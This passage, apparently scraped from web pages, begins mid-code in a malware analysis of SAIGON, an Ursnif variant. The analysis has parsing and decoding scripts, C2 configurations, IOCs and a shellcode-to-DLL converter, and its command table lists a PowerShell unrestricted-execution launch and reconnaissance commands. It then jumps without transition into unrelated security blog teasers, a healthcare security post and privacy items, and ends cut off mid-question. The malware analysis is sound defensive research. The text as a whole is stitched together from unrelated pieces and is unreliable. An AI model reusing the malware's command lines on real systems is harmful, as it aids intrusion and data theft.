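    """Constructed fixture: a header-only PE whose Security directory points at `blob`.
    It is not a SAIGON sample and is not loadable; it exists to exercise find_joined_data."""
    e_lfanew = 0x80
    opt_size = 0xF0 if pe32plus else 0xE0
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    n_dirs_off, dirs_off = (0x6C, 0x70) if pe32plus else (0x5C, 0x60)
    struct.pack_into("<I", opt, n_dirs_off, 16)
    headers_end = e_lfanew + 4 + len(coff) + opt_size
    blob_off = (headers_end + 0x1FF) & ~0x1FF      # next 0x200 boundary, as a linker would place it
    struct.pack_into("<II", opt, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, blob_off, len(blob))
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    image = bytearray(dos) + b"PE\0\0" + coff + bytes(opt)
    image += b"\0" * (blob_off - len(image))
    return bytes(image + blob)


if __name__ == "__main__":
    joined = JOINED_DATA_MAGIC + b"\0" * 30                          # stand-in for a joined-data table
    cert = struct.pack("<IHH", 32, 0x0200, 0x0002) + b"\0" * 24      # WIN_CERTIFICATE-shaped header
    for label, blob in (("joined data", joined), ("Authenticode-like", cert)):
        for plus in (False, True):
            print(label, "PE32+" if plus else "PE32", find_joined_data(build_test_image(blob, plus)))
```

Run against a real sample, a `True` in the last position is a quick triage signal for this storage trick; a `False` on a signed binary is the expected Authenticode case.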

The following is a list of configuration options observed:

Name Checksum   Name            Description
0x97ccd204      HostsList       List of C2 URLs used for communication
0xd82bcb60      ServerKey       Serpent key used for communicating with the C2
0x23a02904      Group           Botnet ID
0x776c71c0      IdlePeriod      Number of seconds to wait before the initial request to the C2
0x22aa2818      MinimumUptime   Waits until the uptime is greater than this value (in seconds)
0x5beb543e      LoadPeriod      Number of seconds to wait between subsequent requests to the C2
0x84485ef2      HostKeepTime    Number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent (in ECB mode, where Ursnif v3 uses CBC), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is similar to that of other Ursnif variants; its components are described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

Name     Description
ver      Bot version (unlike other Ursnif variants this only contains the build number, i.e. only the xxx digits of "3.5.xxx")
group    Botnet ID
id       Client ID
type     Request type (0 when polling for tasks, 6 for system info data uploads)
uptime   Machine uptime in seconds
knock    The bot "knock" period (number of seconds to wait between subsequent requests to the C2; see the LoadPeriod configuration option)

Table 2: Request format components
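As an added example (not FireEye's code), the following Python implements the encoding layer of the beacon described above: it renders the Table 2 query string and encodes or decodes a request body the SAIGON way ('%2B'/'%2F', no noise characters) and, for comparison, the Ursnif v3 way ('_2B'/'_2F' plus random slashes, as listed in Table 4). That is the step an analyst needs to get from captured traffic back to Serpent ciphertext. Serpent itself is left out; the "ciphertext" below is a constructed byte string chosen so its Base64 contains both escaped characters, and the Ursnif v3 slash-insertion rate is an assumption.

```python
import base64
import random
from typing import Optional, Tuple


def build_beacon_query(ver: int, group: int, client_id: Tuple[int, int, int, int],
                       req_type: int, uptime: int, knock: int) -> str:
    """Render the poll string from Table 2:
    ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u
    client_id is the machine ID as four 32-bit words (their derivation is not reproduced here)."""
    a, b, c, d = (x & 0xFFFFFFFF for x in client_id)
    return (f"ver={ver}&group={group}&id={a:08x}{b:08x}{c:08x}{d:08x}"
            f"&type={req_type}&uptime={uptime}&knock={knock}")


def _unpad(b64: str) -> str:
    return b64.rstrip("=")


def _repad(b64: str) -> str:
    return b64 + "=" * (-len(b64) % 4)


def saigon_encode(ciphertext: bytes) -> str:
    """SAIGON body encoding (Table 4, "Payload encoding"): unpadded Base64 of the
    Serpent-ECB ciphertext with '+' -> '%2B' and '/' -> '%2F'; nothing else is added."""
    return _unpad(base64.b64encode(ciphertext).decode()).replace("+", "%2B").replace("/", "%2F")


def saigon_decode(wire: str) -> bytes:
    """Inverse of saigon_encode; the result is still Serpent-ECB ciphertext."""
    return base64.b64decode(_repad(wire.replace("%2B", "+").replace("%2F", "/")))


def ursnif3_encode(ciphertext: bytes, seed: Optional[int] = None) -> str:
    """Ursnif v3 (RM3) body encoding: '+' -> '_2B', '/' -> '_2F', then random '/'
    characters sprinkled in. `seed` makes the noise repeatable for tests; the 20%
    insertion rate is an assumption, the write-up only says "random slashes"."""
    rng = random.Random(seed)
    b64 = _unpad(base64.b64encode(ciphertext).decode()).replace("+", "_2B").replace("/", "_2F")
    out = []
    for ch in b64:
        if rng.random() < 0.2:
            out.append("/")
        out.append(ch)
    return "".join(out)


def ursnif3_decode(wire: str) -> bytes:
    """Strip the noise first: every literal '/' on the wire is noise, because real
    slashes were escaped as _2F before the noise was added."""
    return base64.b64decode(_repad(wire.replace("/", "").replace("_2B", "+").replace("_2F", "/")))


if __name__ == "__main__":
    fake_ciphertext = b"\xfb\xff\xbf\x01"        # constructed: Base64 is "+/+/AQ"
    # ver/group/knock follow the first Appendix A sample (3.50.132, group 1001, LoadPeriod 300);
    # the client ID words are made up.
    print(build_beacon_query(132, 1001, (0x11111111, 0x22222222, 0x33333333, 0x44444444), 0, 3600, 300))
    print("SAIGON :", saigon_encode(fake_ciphertext))
    print("Ursnif3:", ursnif3_encode(fake_ciphertext, seed=7))
```

The order of operations in `ursnif3_decode` is the point of the comparison: slashes must be removed before the `_2F` substitution, otherwise real and noise slashes become indistinguishable. SAIGON's scheme has no such ambiguity, which is one reason its traffic is simpler to recover.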

Capabilities

SAIGON implements the bot commands described in Table 3.

Name Checksum   Name          Description
0x45d4bf54      SELF_DELETE   Uninstalls itself from the machine; removes the scheduled task and deletes its registry key
0xd86c3bdc      LOAD_UPDATE   Downloads data from a URL, decrypts it and verifies the signature, saves it as a .ps1 file and runs it using "PowerShell.exe -ep unrestricted -file %s"
0xeac44e42      GET_SYSINFO   Collects and uploads system information by running:
                                1. "systeminfo.exe"
                                2. "net view"
                                3. "nslookup 127.0.0.1"
                                4. "tasklist.exe /SVC"
                                5. "driverquery.exe"
                                6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"
0x83bf8ea0      LOAD_DLL      Downloads data from a URL, decrypts and verifies it, then uses the same shellcode loader that loaded SAIGON itself to load the DLL into the current process
0xa8e78c43      LOAD_EXE      Downloads data from a URL, decrypts and verifies it, saves it with an .exe extension and invokes it using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (rows where the two differ are marked "(differs)"):

Persistence method
  Ursnif v3 (RM3):        Scheduled task that executes code stored in a registry key using PowerShell
  SAIGON (Ursnif v3.5?):  Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage
  Ursnif v3 (RM3):        Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka Ursnif "joined files")
  SAIGON (Ursnif v3.5?):  Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka Ursnif "joined files")

PRNG algorithm
  Ursnif v3 (RM3):        xorshift64*
  SAIGON (Ursnif v3.5?):  xorshift64*

Checksum algorithm (differs)
  Ursnif v3 (RM3):        JAMCRC (aka CRC32 with all the bits flipped)
  SAIGON (Ursnif v3.5?):  CRC32, with the result rotated to the right by 1 bit

Data compression
  Ursnif v3 (RM3):        aPLib
  SAIGON (Ursnif v3.5?):  aPLib

Encryption/Decryption (differs)
  Ursnif v3 (RM3):        Serpent CBC
  SAIGON (Ursnif v3.5?):  Serpent ECB

Data integrity verification
  Ursnif v3 (RM3):        RSA signature
  SAIGON (Ursnif v3.5?):  RSA signature

Communication method
  Ursnif v3 (RM3):        HTTP POST requests
  SAIGON (Ursnif v3.5?):  HTTP POST requests

Payload encoding (differs)
  Ursnif v3 (RM3):        Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added
  SAIGON (Ursnif v3.5?):  Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes

Uses URL path mimicking? (differs)
  Ursnif v3 (RM3):        Yes
  SAIGON (Ursnif v3.5?):  No

Uses PX file format? (differs)
  Ursnif v3 (RM3):        Yes
  SAIGON (Ursnif v3.5?):  No

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 
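The checksum row of Table 4 is the one place where the two code bases compute a value differently, and it matters when resolving the name checksums listed in Tables 1 and 3 (and the explorer.exe check, 0xc3c07cf0). The following Python is an added example, not from the write-up: it implements both algorithms on top of the standard CRC-32 and brute-forces which candidate name, under which byte-level variant, reproduces a given checksum. How SAIGON feeds the name into the CRC (case, terminator, encoding) is not stated above, so the variants tried are assumptions, and the script simply reports whether any of them matched.

```python
import zlib
from typing import Iterable, Optional, Tuple

MASK32 = 0xFFFFFFFF


def jamcrc(data: bytes) -> int:
    """Ursnif v3 (RM3) name checksum: standard CRC-32 with every bit inverted (JAMCRC)."""
    return (~zlib.crc32(data)) & MASK32


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def saigon_crc(data: bytes) -> int:
    """SAIGON name checksum: standard CRC-32 with the result rotated right by one bit."""
    return ror32(zlib.crc32(data) & MASK32, 1)


# Assumed ways the name might be fed to the CRC; the write-up does not say which, if any, is used.
BYTE_VARIANTS = {
    "as-is": lambda s: s.encode(),
    "lower": lambda s: s.lower().encode(),
    "upper": lambda s: s.upper().encode(),
    "as-is+NUL": lambda s: s.encode() + b"\0",
    "utf-16le": lambda s: s.encode("utf-16-le"),
}
ALGORITHMS = {"jamcrc": jamcrc, "saigon_crc": saigon_crc}


def resolve(checksum: int, candidates: Iterable[str]) -> Optional[Tuple[str, str, str]]:
    """Return (name, algorithm, variant) for the first candidate reproducing `checksum`, else None."""
    for name in candidates:
        for vname, prep in BYTE_VARIANTS.items():
            data = prep(name)
            for aname, fn in ALGORITHMS.items():
                if fn(data) == checksum:
                    return name, aname, vname
    return None


if __name__ == "__main__":
    # Names and checksums from Tables 1 and 3 plus the explorer.exe check from the text.
    names = ["HostsList", "ServerKey", "Group", "IdlePeriod", "MinimumUptime", "LoadPeriod",
             "HostKeepTime", "SELF_DELETE", "LOAD_UPDATE", "GET_SYSINFO", "LOAD_DLL", "LOAD_EXE",
             "explorer.exe"]
    targets = [0x97ccd204, 0xd82bcb60, 0x23a02904, 0x776c71c0, 0x22aa2818, 0x5beb543e, 0x84485ef2,
               0x45d4bf54, 0xd86c3bdc, 0xeac44e42, 0x83bf8ea0, 0xa8e78c43, 0xc3c07cf0]
    for t in targets:
        print(f"{t:#010x} -> {resolve(t, names) or 'no match among the tried variants'}")
```

The same resolver is how API-name hashes are usually recovered from a sample: collect the candidate strings, try each hashing convention the family is known to use, and accept only exact matches.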

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilation timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported by our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations, as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs:

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Group / Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d945334f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b66070ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    # The blob keeps the DLL's NT headers at offset 0, with a 5-byte JMP rel32 (E9 xx xx xx xx)
    # written over the "PE\0\0" signature and the low byte of the COFF Machine field. The high
    # byte of Machine survives (0x01 for 0x014c/i386, 0x86 for 0x8664/AMD64), so both can be restored.
    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
    else:
        print('Unknown architecture.')
        return

    # FileAlignment (optional header offset 0x24, i.e. file offset 0x3c here): force 0x200
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())


if __name__ == "__main__":
    main()

Did You Read Our Most Popular 2019 Blog Posts?

What were your biggest AppSec questions and concerns in 2019? Want to find out what others' were? Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message, look for more of the same in 2020!

Detailed information on vulnerabilities and exploits, and how to prevent and avoid them

The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.

Exploiting Spring Boot Actuators

Exploiting JNDI Injections in Java

Data Extraction to Command Execution CSV Injection

The Top Five Web Application Authentication Vulnerabilities We Find

Managing open source risk

As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.

Introducing New Veracode Software Composition Analysis

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Complying with AppSec regulations

As major data breaches continue to expose customers' sensitive data and cause major monetary and reputation damage to organizations, regulators are taking notice. From the EU General Data Protection Regulation (EU GDPR) to the NY State Department of Financial Services (NY DFS) Cybersecurity Regulations, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals. In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.

PCI Releases Software Security Framework

Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

Subscribe to our content

Did you miss any of these posts last year? Don't miss a thing in 2020; subscribe to our content.

NICE Released the Winter 2019-20 eNewsletter

The Winter 2019-20 NICE eNewsletter has been published to provide subscribers information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office will issue regular eNewsletters that feature spotlight articles on academic, industry, and government developments related to NICE, updates from key NICE programs, projects, the NICE Working Group, and other important news. For

Work in Healthcare? This is Why You Should Give Your Security a Checkup

Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don't more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?

Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal of Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.

Less isn't more in healthcare cybersecurity

Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future. Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.

Josephine Wolff, assistant professor of cybersecurity policy at Tufts' Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The HSR paper proposes that lost passwords and associated security measures, like two-factor authentication, hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks, a point that, its authors suggest, should lead to less aggressive security efforts.

In her article, Wolff argues that a slower remediation process is precisely why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, "Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly, not to write them off as harmful and counterproductive." Even the most basic preventive actions are crucial best practices, and they're just a starting point.

The cyberattack epidemic in healthcare

Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to HIPAA Journal, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. Additionally, figures from the Protenus 2019 Breach Barometer report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached, a number that nearly tripled from 2017 to 2018.

These trends are alarming but important to watch. Our 10th annual State of Software Security (SOSS) report examines trends in various industries, including healthcare, and the data sheds some light on why it's so crucial for organizations to get a jump on security measures.

Healthcare Security Rank

We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to security debt, which accumulates over time as more and more flaws are left uncorrected.

Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that???s a substantial 72 percent reduction in remediation time).

Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.

A process-minded prognosis

The good news in this year's SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.

The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:

  • Include a trained team of security-minded developers
  • Cover all applications across your health organization
  • Include a frequent and steady scanning cadence
  • Have ample resources developers can tap into for testing and fixes
  • Are adaptable enough to handle shifting landscapes in cybersecurity
  • Are equipped to cover third-party vendors used by the organization

Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.

Learn more about cybersecurity in healthcare

Like what you see? Find more info about the state of cybersecurity for healthcare by downloading our SOSS Volume 10 Industry Snapshot, and then check out the full report to keep a pulse on the shifts in DevSecOps over the last ten years. 


For privacy, 2020 is not for hindsight

It has been an exciting few years for privacy. The passing and enforcement of new laws (such as CCPA and GDPR) and modifications made to others have caused a flurry of activity across organizations of all sizes. Decisions have been made about how to meet the laws' requirements by changing procedures and policies. Now it is […]

The post For privacy, 2020 is not for hindsight appeared first on Privacy Ref.

CCPA and University Surveillance Apps

It’s the turn of a new decade and a new privacy law has gone into effect — the California Consumer Privacy Act or CCPA. A quick check with some of my fellow privacy pros on how many consumer information requests received at the end of the day on Jan. 1, puts retail at higher numbers […]

The post CCPA and University Surveillance Apps appeared first on Privacy Ref.

Who Needs WMDs (Weapons of Mass Destruction) Today ?

Folks,

Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more than 10 years ago, and recently asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.

In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.


So without further ado, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?


Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.


Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?

Today, all you need is two WDs in the same (pl)ACE and it's Game Over.


Puzzled? Allow me to give you a HINT:

Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
